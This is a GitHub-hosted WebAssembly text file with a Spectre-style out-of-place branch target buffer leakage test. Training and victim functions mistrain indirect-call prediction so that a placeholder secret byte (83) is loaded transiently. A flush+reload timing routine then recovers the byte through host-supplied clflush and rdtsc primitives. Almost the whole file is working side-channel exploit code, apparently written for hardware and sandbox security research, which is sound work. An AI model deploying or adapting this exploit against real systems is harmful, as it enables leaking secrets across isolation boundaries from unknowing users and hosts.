-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathbtb_leakage.wat
303 lines (283 loc) · 10.3 KB
/
btb_leakage.wat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
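;; Basic out-of-place BTB (branch target buffer) leakage test. The secret byte is 83 ("S").
;; Linear memory usage:
;; [0, 12), [128, 140) - reserved for the fd_write parameters and output buffer used by $output
;; [64, 72) - 64-bit timestamp written by the rdtsc import (read back by $readTimer)
;; k * 4096 for k in 0..255 - probe slots written by $initializeMemory and timed by $exfiltrate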
(module
;; Function signatures referenced by index or name below.
;; type 0: no parameters, returns i32 (used by the fence import)
(type (;0;) (func (result i32)))
;; type 1: no parameters, no result (used by $fence)
(type (;1;) (func ))
;; type 2: one i32 parameter, returns i32 (used by the clflush_* and rdtsc imports)
(type (;2;) (func (param i32) (result i32)))
;; type 3 ($param32): one i32 parameter, no result (used by the call_indirect in $main)
(type (;3;)$param32 (func (param i32)))
;; Host-provided primitives.
;; NOTE(review): clflush_guestaddr, clflush_hostaddr, fence and rdtsc are not part of the
;; standard wasi_snapshot_preview1 interface; the embedding host has to supply them.
(import "wasi_snapshot_preview1" "clflush_guestaddr" (func $__wasi_clflush_guestaddr (type 2)))
;; NOTE(review): $__wasi_clflush_hostaddr is imported but not called anywhere in the visible source.
(import "wasi_snapshot_preview1" "clflush_hostaddr" (func $__wasi_clflush_hostaddr (type 2)))
(import "wasi_snapshot_preview1" "fence" (func $__wasi_fence (type 0)))
(import "wasi_snapshot_preview1" "rdtsc" (func $__wasi_rdtsc (type 2))) ;; rdtsc expects a pointer-to-u64 and will write the tsc value to that location
;; NOTE(review): fd_write is taken from "wasi_unstable" while the other imports use
;; "wasi_snapshot_preview1" - confirm the host exposes both module names.
(import "wasi_unstable" "fd_write" (func $writef (param $fd i32) (param $iovec i32) (param $len i32) (param $written i32) (result i32)))
;; Indirect-call table with 4 slots; the elem segment fills slots 0..2 and leaves slot 3 empty.
(table (;0;) 4 anyfunc)
;; slot 0 = $flush, slot 1 = $fread, slot 2 = $ftrain
(elem (i32.const 0) $flush $fread $ftrain)
;; initial size 2024 pages, maximum 65535 pages
(memory (;0;) 2024 65535) ;; pages of 65536 bytes
;; the real version
;; NOTE(review): this comment used to say "10000 iterations", but $total_times below is
;; initialised to 1000000 - confirm which count is intended.
;; $main (exported as "main"): driver for the experiment.
;; Sets up the probe memory ($initializeMemory, $warmup), obtains the timing threshold from
;; $getThreshold, then repeats the outer loop $total_times times:
;;   1. 100 direct calls of $ftrain with index 1,
;;   2. a flush of all 256 probe slots,
;;   3. 10 rounds of an indirect call through table slot 1 with index 2, each followed by
;;      a probe pass in $exfiltrate.
(func $main (export "main") (local $total_times i32)(local $times i32)(local $cache_threshold i64)
(call $initializeMemory)
(call $warmup)
;; $getThreshold leaves an i64 on the stack; the next instruction stores it
(call $getThreshold)
(set_local $cache_threshold)
(set_local $total_times (i32.const 1000000))
(loop $L0
;; disabled; no $evict function is defined in the visible source
;; (call $evict)
(call $fence)
;; phase 1: call $ftrain(1) 100 times
(set_local $times (i32.const 100))
(loop $L1
(call $ftrain (i32.const 1))
(set_local $times (i32.sub (get_local $times) (i32.const 1)))
(br_if $L1 (get_local $times))
)
;; phase 2: flush every probe slot before measuring
(call $flushLinearMemory)
;; phase 3: 10 rounds of indirect call + probe
(set_local $times (i32.const 10))
(loop $L2
;; argument for the callee: index 2
(i32.const 2)
;; table slot 1, which the elem segment fills with $fread
(i32.const 1)
(call_indirect (type $param32))
;; time all 256 probe slots against the threshold
(get_local $cache_threshold)
(call $exfiltrate)
(set_local $times (i32.sub (get_local $times) (i32.const 1)))
(br_if $L2 (get_local $times))
)
(set_local $total_times (i32.sub (get_local $total_times) (i32.const 1)))
(br_if $L0 (get_local $total_times))
)
)
;; the training function needs to be careful to not touch(load) any linear memory
;; NOTE(review): the index-0 and index-1 paths below do load address 2000 and perform stores;
;; presumably the requirement is only to stay away from the probe slots being measured - confirm.
;; $ftrain (exported as "ftrain"; also placed in table slot 2 by the elem segment).
;; Called directly from $main with $br_index = 1.
;; param $br_index: selects the br_table target:
;;   0        -> runs the store to 4096, then the load of 2000 and the following store
;;   1        -> runs only the load of 2000 and the following store
;;   2 and up -> skips both
(func $ftrain (export "ftrain") (param $br_index i32) (local $taken_br_cond i32)
;; $taken_br_cond is written here and never read in this function
(set_local $taken_br_cond (i32.const 99))
(block
;; leave a signature on the BHB by doing enough taken conditional jumps. 35 seems to be good for both Ryzen and lakes
;; need to check if this gets compiled to taken branch by cranelift
;; NOTE(review): no run of conditional jumps is present in this body - confirm whether it was removed.
(block
(block
(block
(get_local $br_index)
;; labels: 0 = innermost block, 1 = next block out, 2 = the block after that; default is label 2
(br_table 0 1 2 2)
)
;; reached only for index 0
(i32.store (i32.const 4096)(i32.const 4096))
)
;; train the code to jump here (index 1)
(i32.load (i32.const 2000))
;; the loaded word is the store address and 83 is the stored value
(i32.store (i32.const 83)) ;; just prevent optimization
)
;; leave the outer block (skipping the padding) when $br_index == 1
(get_local $br_index)
(br_if 0 (i32.eq (i32.const 1)))
;; padding, should not be executed
(call $readTimer)
(drop)
)
(call $noopfunc)
(call $noopfunc)
)
;; $noopfunc (exported as "noopfunc"): empty function; $ftrain and $fread each call it twice on exit.
(func $noopfunc (export "noopfunc"))
;; $fread (exported as "fread"; also placed in table slot 1 by the elem segment).
;; $main reaches it through call_indirect with $br_index = 2.
;; param $br_index: selects the br_table target:
;;   0        -> runs the store to 4096, then the load of 339968 and the following store
;;   1        -> runs only the load of 339968 and the following store
;;   2 and up -> skips both
(func $fread (export "fread") (param $br_index i32) (local $taken_br_cond i32)
;; identical to $ftrain up to the br_table
;; $taken_br_cond is written here and never read in this function
(set_local $taken_br_cond (i32.const 99))
(block
(block
(block
(block
(get_local $br_index)
;; labels: 0 = innermost block, 1 = next block out, 2 = the block after that; default is label 2
(br_table 0 1 2 2)
)
;; reached only for index 0
(i32.store (i32.const 4096)(i32.const 4096))
)
;; transiently jump here
(i32.load (i32.const 339968)) ;; 339968=83*4096; assume "S"(83) is the secret byte
;; the loaded word is the store address and 83 is the stored value
(i32.store (i32.const 83)) ;; just prevent optimization
)
;; normal control flow to exit function
;; empty noopcall which will be patched by debugging to flush
;; leave the outer block (skipping the timer call) when $br_index == 2
(get_local $br_index)
(br_if 0 (i32.eq (i32.const 2)))
;; prevent optimization
(call $readTimer)
(drop)
)
(call $noopfunc)
(call $noopfunc)
)
;; /////////////////////////////////////////////////////
;; Helper Functions
;; $exfiltrate: time one load from each of the 256 probe slots and report the fast ones.
;; param $cache_threshold: a slot whose measured load time is not greater than this value
;;                         (unsigned compare) is passed to $output.
;; Slots are visited in the scrambled order slot = (i * 167 + 13) & 255 for i = 255 down to 0
;; (first slot is 102), and every slot is flushed again after it has been timed.
(func $exfiltrate (param $cache_threshold i64)
  (local $t_before i64) (local $t_after i64) (local $elapsed i64)
  (local $i i32) (local $slot i32) (local $probe_addr i32)
  (local $last_hit i32) (local $unused_threshold i64)
  ;; 256 is outside the 0..255 slot range, i.e. "nothing found yet"
  i32.const 256
  set_local $last_hit
  i32.const 256
  set_local $i
  loop $probe
    ;; i = i - 1
    get_local $i
    i32.const 1
    i32.sub
    set_local $i
    ;; slot = (i * 167 + 13) & 255, scrambled to avoid a linear access pattern
    get_local $i
    i32.const 167
    i32.mul
    i32.const 13
    i32.add
    i32.const 255
    i32.and
    set_local $slot
    ;; probe_addr = slot * 4096
    get_local $slot
    i32.const 4096
    i32.mul
    set_local $probe_addr
    ;; the address is pushed before the first timer read so that only the load
    ;; sits between the two timestamps (optional fences were disabled here)
    get_local $probe_addr
    call $readTimer
    set_local $t_before
    i32.load
    drop
    call $readTimer
    set_local $t_after
    ;; elapsed = t_after - t_before
    get_local $t_after
    get_local $t_before
    i64.sub
    set_local $elapsed
    block $slow
      ;; skip reporting when the load took longer than the threshold
      get_local $elapsed
      get_local $cache_threshold
      i64.gt_u
      br_if $slow
      get_local $slot
      call $output
      get_local $slot
      set_local $last_hit
    end
    ;; evict the slot that was just touched
    get_local $probe_addr
    call $flush
    get_local $i
    br_if $probe
  end
)
;; $readTimer: return the current timestamp as an i64.
;; The rdtsc import is given address 64 as its output pointer; its i32 return value is
;; discarded and the 8 bytes at [64, 72) are then loaded as the result.
(func $readTimer (result i64)
  i32.const 64
  call $__wasi_rdtsc
  drop
  i32.const 64
  i64.load
)
;; $fence: invoke the host fence primitive and discard its i32 return value.
(func $fence (type 1)
  call $__wasi_fence
  drop
)
;; $flush: invoke the host clflush_guestaddr primitive on one linear-memory address.
;; param $memory_index: the address handed to the primitive; the i32 it returns is discarded.
(func $flush (param $memory_index i32)
  get_local $memory_index
  call $__wasi_clflush_guestaddr
  drop
)
;; $flushLinearMemory: flush the 256 probe slots, i.e. addresses slot * 4096 for
;; slot = 255 down to 0.
(func $flushLinearMemory (local $slot i32)
  i32.const 256
  set_local $slot
  loop $next_slot
    ;; slot = slot - 1
    get_local $slot
    i32.const 1
    i32.sub
    set_local $slot
    ;; flush(slot * 4096)
    get_local $slot
    i32.const 4096
    i32.mul
    call $flush
    ;; repeat until slot reaches 0 (slot 0 is flushed on the last pass)
    get_local $slot
    br_if $next_slot
  end
)
;; $getThreshold: derive the timing threshold used by $exfiltrate.
;; Measures one load of address 8192 right after flushing it, then averages 1000 further
;; timed loads of the same address with no flush in between, and combines them as
;;   (average * 80 + first_measurement * 20) / 100
;; i.e. t_cachehit * 80% + t_cachemiss * 20%. Values below this threshold are considered
;; cached access times. The address is flushed again before returning.
;; Returns whatever $printInt returns for the computed threshold.
(func $getThreshold (result i64)
  (local $remaining i32) (local $t0 i64) (local $t1 i64) (local $hit_total i64) (local $miss_delta i64)
  (set_local $remaining (i32.const 1000))
  (set_local $hit_total (i64.const 0))
  ;; single timed load immediately after a flush
  (call $flush (i32.const 8192))
  (call $fence)
  (set_local $t0 (call $readTimer))
  (drop (i32.load (i32.const 8192)))
  (set_local $t1 (call $readTimer))
  (set_local $miss_delta (i64.sub (get_local $t1) (get_local $t0)))
  ;; 1000 timed reloads of the same address (no fences around the load)
  (loop $sample
    (set_local $t0 (call $readTimer))
    (drop (i32.load (i32.const 8192)))
    (set_local $t1 (call $readTimer))
    (set_local $hit_total
      (i64.add (i64.sub (get_local $t1) (get_local $t0)) (get_local $hit_total)))
    (set_local $remaining (i32.sub (get_local $remaining) (i32.const 1)))
    (br_if $sample (get_local $remaining))
  )
  ;; weighted mix; the result stays on the stack across the flush below
  (i64.div_u
    (i64.add
      (i64.mul (i64.div_u (get_local $hit_total) (i64.const 1000)) (i64.const 80))
      (i64.mul (get_local $miss_delta) (i64.const 20)))
    (i64.const 100))
  (call $flush (i32.const 8192))
  ;; prints the threshold and passes it through as this function's result
  (call $printInt)
)
;; just output a single byte, better give it some char printable
;; $output: write the low byte of $value followed by a linefeed to file descriptor 1.
;; param $value: the byte to print (only the low 8 bits are written).
;; Memory layout used for the fd_write call:
;;   [0, 4)   iovec buffer pointer (= 128)
;;   [4, 8)   iovec buffer length  (= 2)
;;   [8, 12)  receives the number of bytes written
;;   128      the value byte
;;   129      linefeed
;; The two bytes are stored adjacently so that the 2-byte iovec actually covers the
;; linefeed. The fd_write return code is ignored.
(func $output (param $value i32)
  ;; iovec: 2 bytes starting at 128
  (i32.store (i32.const 0) (i32.const 128))
  (i32.store (i32.const 4) (i32.const 2))
  ;; payload: value byte, then linefeed
  (i32.store8 (i32.const 128) (get_local $value))
  (i32.store8 (i32.const 129) (i32.const 10))
  ;; fd = 1, iovec array at 0, one iovec, bytes-written result at 8
  (drop (call $writef (i32.const 1) (i32.const 0) (i32.const 1) (i32.const 8)))
)
;; $printInt: print $value as four decimal digits, most significant first, one $output
;; call per digit, and return $value unchanged.
;; param $value: assumed to be <= 9999; for larger values the first character is
;;               48 + value / 1000, which is no longer a decimal digit.
(func $printInt (param $value i64) (result i64)
  ;; thousands: value / 1000
  (call $output
    (i32.wrap_i64
      (i64.add
        (i64.div_u (get_local $value) (i64.const 1000))
        (i64.const 48))))
  ;; hundreds: (value % 1000) / 100
  (call $output
    (i32.wrap_i64
      (i64.add
        (i64.div_u
          (i64.rem_u (get_local $value) (i64.const 1000))
          (i64.const 100))
        (i64.const 48))))
  ;; tens: (value % 100) / 10
  (call $output
    (i32.wrap_i64
      (i64.add
        (i64.div_u
          (i64.rem_u (get_local $value) (i64.const 100))
          (i64.const 10))
        (i64.const 48))))
  ;; ones: value % 10
  (call $output
    (i32.wrap_i64
      (i64.add
        (i64.rem_u (get_local $value) (i64.const 10))
        (i64.const 48))))
  (get_local $value)
)
;; $warmup: touch-then-flush every probe slot once, then exercise the timer.
;; First loop: for slot = 255 down to 0, load slot * 4096, fence, and flush that address.
;; Second loop: 10000 back-to-back pairs of $readTimer calls; the differences are summed
;; into a local that is never read afterwards.
(func $warmup (local $n i32) (local $t_begin i64) (local $t_end i64) (local $acc i64)
  i32.const 256
  set_local $n
  loop $touch
    ;; n = n - 1
    get_local $n
    i32.const 1
    i32.sub
    set_local $n
    ;; load from n * 4096 and discard the value
    get_local $n
    i32.const 4096
    i32.mul
    i32.load
    drop
    call $fence
    ;; flush(n * 4096)
    get_local $n
    i32.const 4096
    i32.mul
    call $flush
    get_local $n
    br_if $touch
  end
  i32.const 10000
  set_local $n
  loop $spin
    call $readTimer
    set_local $t_begin
    call $readTimer
    set_local $t_end
    ;; acc = (t_end - t_begin) + acc
    get_local $t_end
    get_local $t_begin
    i64.sub
    get_local $acc
    i64.add
    set_local $acc
    ;; n = n - 1
    get_local $n
    i32.const 1
    i32.sub
    set_local $n
    get_local $n
    br_if $spin
  end
)
;; $initializeMemory: for slot = 255 down to 0, store the slot number as an i32 at
;; address slot * 4096, fence, and flush that address.
(func $initializeMemory (local $slot i32)
  i32.const 256
  set_local $slot
  loop $fill
    ;; slot = slot - 1
    get_local $slot
    i32.const 1
    i32.sub
    set_local $slot
    ;; mem[slot * 4096] = slot
    get_local $slot
    i32.const 4096
    i32.mul
    get_local $slot
    i32.store
    call $fence
    ;; flush(slot * 4096)
    get_local $slot
    i32.const 4096
    i32.mul
    call $flush
    get_local $slot
    br_if $fill
  end
)
;; /////////////////////////////////////////////////////
(export "_start" (func $main)))